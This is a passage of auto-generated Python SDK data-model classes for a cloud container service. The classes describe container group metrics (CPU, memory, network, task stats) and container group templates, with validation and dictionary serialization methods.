def __init__(self, name=None, rx_bytes=None, rx_packets=None, rx_errors=None, rx_dropped=None, tx_bytes=None, tx_packets=None, tx_dropped=None, tx_errors=None, interface_stats=None, tcp=None, tcp_6=None, udp=None, udp_6=None):
self.name = name
self.rx_bytes = rx_bytes
self.rx_packets = rx_packets
self.rx_errors = rx_errors
self.rx_dropped = rx_dropped
self.tx_bytes = tx_bytes
self.tx_packets = tx_packets
self.tx_dropped = tx_dropped
self.tx_errors = tx_errors
self.interface_stats = []
self.tcp = tcp
self.tcp_6 = tcp_6
self.udp = udp
self.udp_6 = udp_6
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.rx_bytes, 'rx_bytes')
self.validate_required(self.rx_packets, 'rx_packets')
self.validate_required(self.rx_errors, 'rx_errors')
self.validate_required(self.rx_dropped, 'rx_dropped')
self.validate_required(self.tx_bytes, 'tx_bytes')
self.validate_required(self.tx_packets, 'tx_packets')
self.validate_required(self.tx_dropped, 'tx_dropped')
self.validate_required(self.tx_errors, 'tx_errors')
self.validate_required(self.interface_stats, 'interface_stats')
if self.interface_stats:
for k in self.interface_stats:
if k :
k.validate()
self.validate_required(self.tcp, 'tcp')
if self.tcp:
self.tcp.validate()
self.validate_required(self.tcp_6, 'tcp_6')
if self.tcp_6:
self.tcp_6.validate()
self.validate_required(self.udp, 'udp')
if self.udp:
self.udp.validate()
self.validate_required(self.udp_6, 'udp_6')
if self.udp_6:
self.udp_6.validate()
def to_map(self):
result = {}
result['Name'] = self.name
result['RxBytes'] = self.rx_bytes
result['RxPackets'] = self.rx_packets
result['RxErrors'] = self.rx_errors
result['RxDropped'] = self.rx_dropped
result['TxBytes'] = self.tx_bytes
result['TxPackets'] = self.tx_packets
result['TxDropped'] = self.tx_dropped
result['TxErrors'] = self.tx_errors
result['InterfaceStats'] = []
if self.interface_stats is not None:
for k in self.interface_stats:
result['InterfaceStats'].append(k.to_map() if k else None)
else:
result['InterfaceStats'] = None
if self.tcp is not None:
result['Tcp'] = self.tcp.to_map()
else:
result['Tcp'] = None
if self.tcp_6 is not None:
result['Tcp6'] = self.tcp_6.to_map()
else:
result['Tcp6'] = None
if self.udp is not None:
result['Udp'] = self.udp.to_map()
else:
result['Udp'] = None
if self.udp_6 is not None:
result['Udp6'] = self.udp_6.to_map()
else:
result['Udp6'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.rx_bytes = map.get('RxBytes')
self.rx_packets = map.get('RxPackets')
self.rx_errors = map.get('RxErrors')
self.rx_dropped = map.get('RxDropped')
self.tx_bytes = map.get('TxBytes')
self.tx_packets = map.get('TxPackets')
self.tx_dropped = map.get('TxDropped')
self.tx_errors = map.get('TxErrors')
self.interface_stats = []
if map.get('InterfaceStats') is not None:
for k in map.get('InterfaceStats'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsInterfaceStats()
temp_model = temp_model.from_map(k)
self.interface_stats.append(temp_model)
else:
self.interface_stats = None
if map.get('Tcp') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp()
self.tcp = temp_model.from_map(map['Tcp'])
else:
self.tcp = None
if map.get('Tcp6') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp6()
self.tcp_6 = temp_model.from_map(map['Tcp6'])
else:
self.tcp_6 = None
if map.get('Udp') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp()
self.udp = temp_model.from_map(map['Udp'])
else:
self.udp = None
if map.get('Udp6') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp6()
self.udp_6 = temp_model.from_map(map['Udp6'])
else:
self.udp_6 = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsTaskStats(TeaModel):
def __init__(self, nr_sleeping=None, nr_running=None, nr_stopped=None, nr_uninterruptible=None, nr_io_wait=None):
self.nr_sleeping = nr_sleeping
self.nr_running = nr_running
self.nr_stopped = nr_stopped
self.nr_uninterruptible = nr_uninterruptible
self.nr_io_wait = nr_io_wait
def validate(self):
self.validate_required(self.nr_sleeping, 'nr_sleeping')
self.validate_required(self.nr_running, 'nr_running')
self.validate_required(self.nr_stopped, 'nr_stopped')
self.validate_required(self.nr_uninterruptible, 'nr_uninterruptible')
self.validate_required(self.nr_io_wait, 'nr_io_wait')
def to_map(self):
result = {}
result['NrSleeping'] = self.nr_sleeping
result['NrRunning'] = self.nr_running
result['NrStopped'] = self.nr_stopped
result['NrUninterruptible'] = self.nr_uninterruptible
result['NrIoWait'] = self.nr_io_wait
return result
def from_map(self, map={}):
self.nr_sleeping = map.get('NrSleeping')
self.nr_running = map.get('NrRunning')
self.nr_stopped = map.get('NrStopped')
self.nr_uninterruptible = map.get('NrUninterruptible')
self.nr_io_wait = map.get('NrIoWait')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStats(TeaModel):
def __init__(self, timestamp=None, fs_stats=None, accelerator_stats=None, cpu_stats=None, disk_io_stats=None, memory_stats=None, network_stats=None, task_stats=None):
self.timestamp = timestamp
self.fs_stats = []
self.accelerator_stats = []
self.cpu_stats = cpu_stats
self.disk_io_stats = disk_io_stats
self.memory_stats = memory_stats
self.network_stats = network_stats
self.task_stats = task_stats
def validate(self):
self.validate_required(self.timestamp, 'timestamp')
self.validate_required(self.fs_stats, 'fs_stats')
if self.fs_stats:
for k in self.fs_stats:
if k :
k.validate()
self.validate_required(self.accelerator_stats, 'accelerator_stats')
if self.accelerator_stats:
for k in self.accelerator_stats:
if k :
k.validate()
self.validate_required(self.cpu_stats, 'cpu_stats')
if self.cpu_stats:
self.cpu_stats.validate()
self.validate_required(self.disk_io_stats, 'disk_io_stats')
if self.disk_io_stats:
self.disk_io_stats.validate()
self.validate_required(self.memory_stats, 'memory_stats')
if self.memory_stats:
self.memory_stats.validate()
self.validate_required(self.network_stats, 'network_stats')
if self.network_stats:
self.network_stats.validate()
self.validate_required(self.task_stats, 'task_stats')
if self.task_stats:
self.task_stats.validate()
def to_map(self):
result = {}
result['Timestamp'] = self.timestamp
result['FsStats'] = []
if self.fs_stats is not None:
for k in self.fs_stats:
result['FsStats'].append(k.to_map() if k else None)
else:
result['FsStats'] = None
result['AcceleratorStats'] = []
if self.accelerator_stats is not None:
for k in self.accelerator_stats:
result['AcceleratorStats'].append(k.to_map() if k else None)
else:
result['AcceleratorStats'] = None
if self.cpu_stats is not None:
result['CpuStats'] = self.cpu_stats.to_map()
else:
result['CpuStats'] = None
if self.disk_io_stats is not None:
result['DiskIoStats'] = self.disk_io_stats.to_map()
else:
result['DiskIoStats'] = None
if self.memory_stats is not None:
result['MemoryStats'] = self.memory_stats.to_map()
else:
result['MemoryStats'] = None
if self.network_stats is not None:
result['NetworkStats'] = self.network_stats.to_map()
else:
result['NetworkStats'] = None
if self.task_stats is not None:
result['TaskStats'] = self.task_stats.to_map()
else:
result['TaskStats'] = None
return result
def from_map(self, map={}):
self.timestamp = map.get('Timestamp')
self.fs_stats = []
if map.get('FsStats') is not None:
for k in map.get('FsStats'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsFsStats()
temp_model = temp_model.from_map(k)
self.fs_stats.append(temp_model)
else:
self.fs_stats = None
self.accelerator_stats = []
if map.get('AcceleratorStats') is not None:
for k in map.get('AcceleratorStats'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsAcceleratorStats()
temp_model = temp_model.from_map(k)
self.accelerator_stats.append(temp_model)
else:
self.accelerator_stats = None
if map.get('CpuStats') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStats()
self.cpu_stats = temp_model.from_map(map['CpuStats'])
else:
self.cpu_stats = None
if map.get('DiskIoStats') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStats()
self.disk_io_stats = temp_model.from_map(map['DiskIoStats'])
else:
self.disk_io_stats = None
if map.get('MemoryStats') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStats()
self.memory_stats = temp_model.from_map(map['MemoryStats'])
else:
self.memory_stats = None
if map.get('NetworkStats') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStats()
self.network_stats = temp_model.from_map(map['NetworkStats'])
else:
self.network_stats = None
if map.get('TaskStats') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsTaskStats()
self.task_stats = temp_model.from_map(map['TaskStats'])
else:
self.task_stats = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerCpu(TeaModel):
def __init__(self, limit=None, max_limit=None, mask=None, quota=None, period=None):
self.limit = limit
self.max_limit = max_limit
self.mask = mask
self.quota = quota
self.period = period
def validate(self):
self.validate_required(self.limit, 'limit')
self.validate_required(self.max_limit, 'max_limit')
self.validate_required(self.mask, 'mask')
self.validate_required(self.quota, 'quota')
self.validate_required(self.period, 'period')
def to_map(self):
result = {}
result['Limit'] = self.limit
result['MaxLimit'] = self.max_limit
result['Mask'] = self.mask
result['Quota'] = self.quota
result['Period'] = self.period
return result
def from_map(self, map={}):
self.limit = map.get('Limit')
self.max_limit = map.get('MaxLimit')
self.mask = map.get('Mask')
self.quota = map.get('Quota')
self.period = map.get('Period')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerMemory(TeaModel):
def __init__(self, limit=None, reservation=None, swap_limit=None):
self.limit = limit
self.reservation = reservation
self.swap_limit = swap_limit
def validate(self):
self.validate_required(self.limit, 'limit')
self.validate_required(self.reservation, 'reservation')
self.validate_required(self.swap_limit, 'swap_limit')
def to_map(self):
result = {}
result['Limit'] = self.limit
result['Reservation'] = self.reservation
result['SwapLimit'] = self.swap_limit
return result
def from_map(self, map={}):
self.limit = map.get('Limit')
self.reservation = map.get('Reservation')
self.swap_limit = map.get('SwapLimit')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpec(TeaModel):
def __init__(self, creation_time=None, has_cpu=None, has_memory=None, has_network=None, has_filesystem=None, has_disk_io=None, has_custom_metrics=None, image=None, labels=None, envs=None, container_cpu=None, container_memory=None):
self.creation_time = creation_time
self.has_cpu = has_cpu
self.has_memory = has_memory
self.has_network = has_network
self.has_filesystem = has_filesystem
self.has_disk_io = has_disk_io
self.has_custom_metrics = has_custom_metrics
self.image = image
self.labels = labels
self.envs = envs
self.container_cpu = container_cpu
self.container_memory = container_memory
def validate(self):
self.validate_required(self.creation_time, 'creation_time')
self.validate_required(self.has_cpu, 'has_cpu')
self.validate_required(self.has_memory, 'has_memory')
self.validate_required(self.has_network, 'has_network')
self.validate_required(self.has_filesystem, 'has_filesystem')
self.validate_required(self.has_disk_io, 'has_disk_io')
self.validate_required(self.has_custom_metrics, 'has_custom_metrics')
self.validate_required(self.image, 'image')
self.validate_required(self.labels, 'labels')
self.validate_required(self.envs, 'envs')
self.validate_required(self.container_cpu, 'container_cpu')
if self.container_cpu:
self.container_cpu.validate()
self.validate_required(self.container_memory, 'container_memory')
if self.container_memory:
self.container_memory.validate()
def to_map(self):
result = {}
result['CreationTime'] = self.creation_time
result['HasCpu'] = self.has_cpu
result['HasMemory'] = self.has_memory
result['HasNetwork'] = self.has_network
result['HasFilesystem'] = self.has_filesystem
result['HasDiskIo'] = self.has_disk_io
result['HasCustomMetrics'] = self.has_custom_metrics
result['Image'] = self.image
result['Labels'] = self.labels
result['Envs'] = self.envs
if self.container_cpu is not None:
result['ContainerCpu'] = self.container_cpu.to_map()
else:
result['ContainerCpu'] = None
if self.container_memory is not None:
result['ContainerMemory'] = self.container_memory.to_map()
else:
result['ContainerMemory'] = None
return result
def from_map(self, map={}):
self.creation_time = map.get('CreationTime')
self.has_cpu = map.get('HasCpu')
self.has_memory = map.get('HasMemory')
self.has_network = map.get('HasNetwork')
self.has_filesystem = map.get('HasFilesystem')
self.has_disk_io = map.get('HasDiskIo')
self.has_custom_metrics = map.get('HasCustomMetrics')
self.image = map.get('Image')
self.labels = map.get('Labels')
self.envs = map.get('Envs')
if map.get('ContainerCpu') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerCpu()
self.container_cpu = temp_model.from_map(map['ContainerCpu'])
else:
self.container_cpu = None
if map.get('ContainerMemory') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpecContainerMemory()
self.container_memory = temp_model.from_map(map['ContainerMemory'])
else:
self.container_memory = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfos(TeaModel):
def __init__(self, id=None, name=None, namespace=None, labels=None, container_stats=None, container_spec=None, aliases=None):
self.id = id
self.name = name
self.namespace = namespace
self.labels = labels
self.container_stats = []
self.container_spec = container_spec
self.aliases = []
def validate(self):
self.validate_required(self.id, 'id')
self.validate_required(self.name, 'name')
self.validate_required(self.namespace, 'namespace')
self.validate_required(self.labels, 'labels')
self.validate_required(self.container_stats, 'container_stats')
if self.container_stats:
for k in self.container_stats:
if k :
k.validate()
self.validate_required(self.container_spec, 'container_spec')
if self.container_spec:
self.container_spec.validate()
self.validate_required(self.aliases, 'aliases')
def to_map(self):
result = {}
result['Id'] = self.id
result['Name'] = self.name
result['Namespace'] = self.namespace
result['Labels'] = self.labels
result['ContainerStats'] = []
if self.container_stats is not None:
for k in self.container_stats:
result['ContainerStats'].append(k.to_map() if k else None)
else:
result['ContainerStats'] = None
if self.container_spec is not None:
result['ContainerSpec'] = self.container_spec.to_map()
else:
result['ContainerSpec'] = None
result['Aliases'] = []
if self.aliases is not None:
for k in self.aliases:
result['Aliases'].append(k)
else:
result['Aliases'] = None
return result
def from_map(self, map={}):
self.id = map.get('Id')
self.name = map.get('Name')
self.namespace = map.get('Namespace')
self.labels = map.get('Labels')
self.container_stats = []
if map.get('ContainerStats') is not None:
for k in map.get('ContainerStats'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStats()
temp_model = temp_model.from_map(k)
self.container_stats.append(temp_model)
else:
self.container_stats = None
if map.get('ContainerSpec') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerSpec()
self.container_spec = temp_model.from_map(map['ContainerSpec'])
else:
self.container_spec = None
self.aliases = []
if map.get('Aliases') is not None:
for k in map.get('Aliases'):
self.aliases.append(k)
else:
self.aliases = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatas(TeaModel):
def __init__(self, container_group_id=None, records=None, container_infos=None):
self.container_group_id = container_group_id
self.records = []
self.container_infos = []
def validate(self):
self.validate_required(self.container_group_id, 'container_group_id')
self.validate_required(self.records, 'records')
if self.records:
for k in self.records:
if k :
k.validate()
self.validate_required(self.container_infos, 'container_infos')
if self.container_infos:
for k in self.container_infos:
if k :
k.validate()
def to_map(self):
result = {}
result['ContainerGroupId'] = self.container_group_id
result['Records'] = []
if self.records is not None:
for k in self.records:
result['Records'].append(k.to_map() if k else None)
else:
result['Records'] = None
result['ContainerInfos'] = []
if self.container_infos is not None:
for k in self.container_infos:
result['ContainerInfos'].append(k.to_map() if k else None)
else:
result['ContainerInfos'] = None
return result
def from_map(self, map={}):
self.container_group_id = map.get('ContainerGroupId')
self.records = []
if map.get('Records') is not None:
for k in map.get('Records'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecords()
temp_model = temp_model.from_map(k)
self.records.append(temp_model)
else:
self.records = None
self.container_infos = []
if map.get('ContainerInfos') is not None:
for k in map.get('ContainerInfos'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfos()
temp_model = temp_model.from_map(k)
self.container_infos.append(temp_model)
else:
self.container_infos = None
return self
class DescribeContainerGroupMetricRequest(TeaModel):
def __init__(self, region_id=None, container_group_id=None, start_time=None, end_time=None, period=None):
self.region_id = region_id
self.container_group_id = container_group_id
self.start_time = start_time
self.end_time = end_time
self.period = period
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.container_group_id, 'container_group_id')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupId'] = self.container_group_id
result['StartTime'] = self.start_time
result['EndTime'] = self.end_time
result['Period'] = self.period
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_id = map.get('ContainerGroupId')
self.start_time = map.get('StartTime')
self.end_time = map.get('EndTime')
self.period = map.get('Period')
return self
class DescribeContainerGroupMetricResponse(TeaModel):
def __init__(self, request_id=None, container_group_id=None, records=None):
self.request_id = request_id
self.container_group_id = container_group_id
self.records = []
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.container_group_id, 'container_group_id')
self.validate_required(self.records, 'records')
if self.records:
for k in self.records:
if k :
k.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['ContainerGroupId'] = self.container_group_id
result['Records'] = []
if self.records is not None:
for k in self.records:
result['Records'].append(k.to_map() if k else None)
else:
result['Records'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.container_group_id = map.get('ContainerGroupId')
self.records = []
if map.get('Records') is not None:
for k in map.get('Records'):
temp_model = DescribeContainerGroupMetricResponseRecords()
temp_model = temp_model.from_map(k)
self.records.append(temp_model)
else:
self.records = None
return self
class DescribeContainerGroupMetricResponseRecordsContainersCPU(TeaModel):
def __init__(self, usage_nano_cores=None, usage_core_nano_seconds=None, load=None, limit=None):
self.usage_nano_cores = usage_nano_cores
self.usage_core_nano_seconds = usage_core_nano_seconds
self.load = load
self.limit = limit
def validate(self):
self.validate_required(self.usage_nano_cores, 'usage_nano_cores')
self.validate_required(self.usage_core_nano_seconds, 'usage_core_nano_seconds')
self.validate_required(self.load, 'load')
self.validate_required(self.limit, 'limit')
def to_map(self):
result = {}
result['UsageNanoCores'] = self.usage_nano_cores
result['UsageCoreNanoSeconds'] = self.usage_core_nano_seconds
result['Load'] = self.load
result['Limit'] = self.limit
return result
def from_map(self, map={}):
self.usage_nano_cores = map.get('UsageNanoCores')
self.usage_core_nano_seconds = map.get('UsageCoreNanoSeconds')
self.load = map.get('Load')
self.limit = map.get('Limit')
return self
class DescribeContainerGroupMetricResponseRecordsContainersMemory(TeaModel):
def __init__(self, available_bytes=None, usage_bytes=None, cache=None, working_set=None, rss=None):
self.available_bytes = available_bytes
self.usage_bytes = usage_bytes
self.cache = cache
self.working_set = working_set
self.rss = rss
def validate(self):
self.validate_required(self.available_bytes, 'available_bytes')
self.validate_required(self.usage_bytes, 'usage_bytes')
self.validate_required(self.cache, 'cache')
self.validate_required(self.working_set, 'working_set')
self.validate_required(self.rss, 'rss')
def to_map(self):
result = {}
result['AvailableBytes'] = self.available_bytes
result['UsageBytes'] = self.usage_bytes
result['Cache'] = self.cache
result['WorkingSet'] = self.working_set
result['Rss'] = self.rss
return result
def from_map(self, map={}):
self.available_bytes = map.get('AvailableBytes')
self.usage_bytes = map.get('UsageBytes')
self.cache = map.get('Cache')
self.working_set = map.get('WorkingSet')
self.rss = map.get('Rss')
return self
class DescribeContainerGroupMetricResponseRecordsContainers(TeaModel):
def __init__(self, name=None, _cpu=None, memory=None):
self.name = name
self._cpu = _cpu
self.memory = memory
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self._cpu, '_cpu')
if self._cpu:
self._cpu.validate()
self.validate_required(self.memory, 'memory')
if self.memory:
self.memory.validate()
def to_map(self):
result = {}
result['Name'] = self.name
if self._cpu is not None:
result['CPU'] = self._cpu.to_map()
else:
result['CPU'] = None
if self.memory is not None:
result['Memory'] = self.memory.to_map()
else:
result['Memory'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
if map.get('CPU') is not None:
temp_model = DescribeContainerGroupMetricResponseRecordsContainersCPU()
self._cpu = temp_model.from_map(map['CPU'])
else:
self._cpu = None
if map.get('Memory') is not None:
temp_model = DescribeContainerGroupMetricResponseRecordsContainersMemory()
self.memory = temp_model.from_map(map['Memory'])
else:
self.memory = None
return self
class DescribeContainerGroupMetricResponseRecordsCPU(TeaModel):
def __init__(self, usage_nano_cores=None, usage_core_nano_seconds=None, load=None, limit=None):
self.usage_nano_cores = usage_nano_cores
self.usage_core_nano_seconds = usage_core_nano_seconds
self.load = load
self.limit = limit
def validate(self):
self.validate_required(self.usage_nano_cores, 'usage_nano_cores')
self.validate_required(self.usage_core_nano_seconds, 'usage_core_nano_seconds')
self.validate_required(self.load, 'load')
self.validate_required(self.limit, 'limit')
def to_map(self):
result = {}
result['UsageNanoCores'] = self.usage_nano_cores
result['UsageCoreNanoSeconds'] = self.usage_core_nano_seconds
result['Load'] = self.load
result['Limit'] = self.limit
return result
def from_map(self, map={}):
self.usage_nano_cores = map.get('UsageNanoCores')
self.usage_core_nano_seconds = map.get('UsageCoreNanoSeconds')
self.load = map.get('Load')
self.limit = map.get('Limit')
return self
class DescribeContainerGroupMetricResponseRecordsMemory(TeaModel):
def __init__(self, available_bytes=None, usage_bytes=None, cache=None, working_set=None, rss=None):
self.available_bytes = available_bytes
self.usage_bytes = usage_bytes
self.cache = cache
self.working_set = working_set
self.rss = rss
def validate(self):
self.validate_required(self.available_bytes, 'available_bytes')
self.validate_required(self.usage_bytes, 'usage_bytes')
self.validate_required(self.cache, 'cache')
self.validate_required(self.working_set, 'working_set')
self.validate_required(self.rss, 'rss')
def to_map(self):
result = {}
result['AvailableBytes'] = self.available_bytes
result['UsageBytes'] = self.usage_bytes
result['Cache'] = self.cache
result['WorkingSet'] = self.working_set
result['Rss'] = self.rss
return result
def from_map(self, map={}):
self.available_bytes = map.get('AvailableBytes')
self.usage_bytes = map.get('UsageBytes')
self.cache = map.get('Cache')
self.working_set = map.get('WorkingSet')
self.rss = map.get('Rss')
return self
class DescribeContainerGroupMetricResponseRecordsNetworkInterfaces(TeaModel):
def __init__(self, tx_bytes=None, rx_bytes=None, tx_errors=None, rx_errors=None, name=None):
self.tx_bytes = tx_bytes
self.rx_bytes = rx_bytes
self.tx_errors = tx_errors
self.rx_errors = rx_errors
self.name = name
def validate(self):
self.validate_required(self.tx_bytes, 'tx_bytes')
self.validate_required(self.rx_bytes, 'rx_bytes')
self.validate_required(self.tx_errors, 'tx_errors')
self.validate_required(self.rx_errors, 'rx_errors')
self.validate_required(self.name, 'name')
def to_map(self):
result = {}
result['TxBytes'] = self.tx_bytes
result['RxBytes'] = self.rx_bytes
result['TxErrors'] = self.tx_errors
result['RxErrors'] = self.rx_errors
result['Name'] = self.name
return result
def from_map(self, map={}):
self.tx_bytes = map.get('TxBytes')
self.rx_bytes = map.get('RxBytes')
self.tx_errors = map.get('TxErrors')
self.rx_errors = map.get('RxErrors')
self.name = map.get('Name')
return self
class DescribeContainerGroupMetricResponseRecordsNetwork(TeaModel):
def __init__(self, interfaces=None):
self.interfaces = []
def validate(self):
self.validate_required(self.interfaces, 'interfaces')
if self.interfaces:
for k in self.interfaces:
if k :
k.validate()
def to_map(self):
result = {}
result['Interfaces'] = []
if self.interfaces is not None:
for k in self.interfaces:
result['Interfaces'].append(k.to_map() if k else None)
else:
result['Interfaces'] = None
return result
def from_map(self, map={}):
self.interfaces = []
if map.get('Interfaces') is not None:
for k in map.get('Interfaces'):
temp_model = DescribeContainerGroupMetricResponseRecordsNetworkInterfaces()
temp_model = temp_model.from_map(k)
self.interfaces.append(temp_model)
else:
self.interfaces = None
return self
class DescribeContainerGroupMetricResponseRecords(TeaModel):
def __init__(self, timestamp=None, containers=None, _cpu=None, memory=None, network=None):
self.timestamp = timestamp
self.containers = []
self._cpu = _cpu
self.memory = memory
self.network = network
def validate(self):
self.validate_required(self.timestamp, 'timestamp')
self.validate_required(self.containers, 'containers')
if self.containers:
for k in self.containers:
if k :
k.validate()
self.validate_required(self._cpu, '_cpu')
if self._cpu:
self._cpu.validate()
self.validate_required(self.memory, 'memory')
if self.memory:
self.memory.validate()
self.validate_required(self.network, 'network')
if self.network:
self.network.validate()
def to_map(self):
result = {}
result['Timestamp'] = self.timestamp
result['Containers'] = []
if self.containers is not None:
for k in self.containers:
result['Containers'].append(k.to_map() if k else None)
else:
result['Containers'] = None
if self._cpu is not None:
result['CPU'] = self._cpu.to_map()
else:
result['CPU'] = None
if self.memory is not None:
result['Memory'] = self.memory.to_map()
else:
result['Memory'] = None
if self.network is not None:
result['Network'] = self.network.to_map()
else:
result['Network'] = None
return result
def from_map(self, map={}):
self.timestamp = map.get('Timestamp')
self.containers = []
if map.get('Containers') is not None:
for k in map.get('Containers'):
temp_model = DescribeContainerGroupMetricResponseRecordsContainers()
temp_model = temp_model.from_map(k)
self.containers.append(temp_model)
else:
self.containers = None
if map.get('CPU') is not None:
temp_model = DescribeContainerGroupMetricResponseRecordsCPU()
self._cpu = temp_model.from_map(map['CPU'])
else:
self._cpu = None
if map.get('Memory') is not None:
temp_model = DescribeContainerGroupMetricResponseRecordsMemory()
self.memory = temp_model.from_map(map['Memory'])
else:
self.memory = None
if map.get('Network') is not None:
temp_model = DescribeContainerGroupMetricResponseRecordsNetwork()
self.network = temp_model.from_map(map['Network'])
else:
self.network = None
return self
class UpdateContainerGroupByTemplateRequest(TeaModel):
def __init__(self, region_id=None, template=None, client_token=None):
self.region_id = region_id
self.template = template
self.client_token = client_token
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.template, 'template')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['Template'] = self.template
result['ClientToken'] = self.client_token
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.template = map.get('Template')
self.client_token = map.get('ClientToken')
return self
class UpdateContainerGroupByTemplateResponse(TeaModel):
def __init__(self, request_id=None):
self.request_id = request_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
return self
class CreateContainerGroupFromTemplateRequest(TeaModel):
def __init__(self, region_id=None, template=None, client_token=None):
self.region_id = region_id
self.template = template
self.client_token = client_token
def validate(self):
self.validate_required(self.region_id, 'region_id')
self.validate_required(self.template, 'template')
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['Template'] = self.template
result['ClientToken'] = self.client_token
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.template = map.get('Template')
self.client_token = map.get('ClientToken')
return self
class CreateContainerGroupFromTemplateResponse(TeaModel):
def __init__(self, request_id=None, container_group_id=None):
self.request_id = request_id
self.container_group_id = container_group_id
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.container_group_id, 'container_group_id')
def to_map(self):
result = {}
result['RequestId'] = self.request_id
result['ContainerGroupId'] = self.container_group_id
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
self.container_group_id = map.get('ContainerGroupId')
return self
class ExportContainerGroupTemplateRequest(TeaModel):
def __init__(self, region_id=None, container_group_id=None):
self.region_id = region_id
self.container_group_id = container_group_id
def validate(self):
pass
def to_map(self):
result = {}
result['RegionId'] = self.region_id
result['ContainerGroupId'] = self.container_group_id
return result
def from_map(self, map={}):
self.region_id = map.get('RegionId')
self.container_group_id = map.get('ContainerGroupId')
return self
class ExportContainerGroupTemplateResponse(TeaModel):
def __init__(self, request_id=None, template=None):
self.request_id = request_id
self.template = template
def validate(self):
self.validate_required(self.request_id, 'request_id')
self.validate_required(self.template, 'template')
if self.template:
self.template.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.template is not None:
result['Template'] = self.template.to_map()
else:
result['Template'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Template') is not None:
temp_model = ExportContainerGroupTemplateResponseTemplate()
self.template = temp_model.from_map(map['Template'])
else:
self.template = None
return self
class ExportContainerGroupTemplateResponseTemplateTags(TeaModel):
def __init__(self, key=None, value=None):
self.key = key
self.value = value
def validate(self):
self.validate_required(self.key, 'key')
self.validate_required(self.value, 'value')
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
return self
class ExportContainerGroupTemplateResponseTemplateResources(TeaModel):
def __init__(self, cpu=None, memory=None):
self.cpu = cpu
self.memory = memory
def validate(self):
self.validate_required(self.cpu, 'cpu')
self.validate_required(self.memory, 'memory')
def to_map(self):
result = {}
result['Cpu'] = self.cpu
result['Memory'] = self.memory
return result
def from_map(self, map={}):
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFileItems(TeaModel):
def __init__(self, mode=None, path=None, content=None):
self.mode = mode
self.path = path
self.content = content
def validate(self):
self.validate_required(self.mode, 'mode')
self.validate_required(self.path, 'path')
self.validate_required(self.content, 'content')
def to_map(self):
result = {}
result['Mode'] = self.mode
result['Path'] = self.path
result['Content'] = self.content
return result
def from_map(self, map={}):
self.mode = map.get('Mode')
self.path = map.get('Path')
self.content = map.get('Content')
return self
class ExportContainerGroupTemplateResponseTemplateSpecVolumesConfigFile(TeaModel):
def __init__(self, default_mode=None, items=None):
self.default_mode = default_mode
self.items = []
def validate(self):
self.validate_required(self.default_mode, 'default_mode')
self.validate_required(self.items, 'items')
if self.items:
for k in self.items:
if k :
k.validate()
def to_map(self):
result = {}
result['DefaultMode'] = self.default_mode
result['Items'] = []
if self.items is not None:
for k in self.items:
result['Items'].append(k.to_map() if k else None)
else:
result['Items'] = None
return result
def from_map(self, map={}):
